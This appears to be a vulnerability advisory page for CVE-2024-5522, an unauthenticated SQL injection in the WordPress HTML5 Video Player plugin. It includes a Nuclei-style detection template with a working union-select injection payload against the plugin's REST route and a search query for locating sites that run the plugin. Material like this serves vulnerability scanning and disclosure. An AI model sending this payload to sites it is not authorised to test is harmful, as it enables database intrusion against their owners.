漏洞描述
The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks
CVE-2024-5522: WordPress HTML5 Video Player < 2.5.27 - SQL Injection
PoC代码[已公开]
id: CVE-2024-5522
info:
name: WordPress HTML5 Video Player < 2.5.27 - SQL Injection
author: JohnDoeAnonITA
severity: critical
description: |
The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks
remediation: Fixed in 2.5.27
reference:
- https://wpscan.com/vulnerability/bc76ef95-a2a9-4185-8ed9-1059097a506a/
- https://nvd.nist.gov/vuln/detail/CVE-2024-5522
classification:
cvss-score: 9.8
cwe-id: CWE-89
cve-id: CVE-2024-5522
epss-score: 0.7326
epss-percentile: 0.98754
cpe: cpe:2.3:a:bplugins:html5_video_player:*:*:*:*:wordpress:*:*:*
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/html5-video-player"
product: html5_video_player
vendor: bplugins
tags: wpscan,cve,cve2024,wordpress,wp-plugin,wp,sqli,html5-video-player
variables:
num: "999999999"
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5(num)}}'
- type: status
status:
- 200
# digest: 4b0a004830460221008fa073562a28e72904d92b4dbc8634bd276c6a6ca28bccabb5abb6f1f424960902210090f9f402266082e0326311812a77a7bb17aa228fee59cb386130992d81eb6e4c:922c64590222798bb761d5b6d8e72950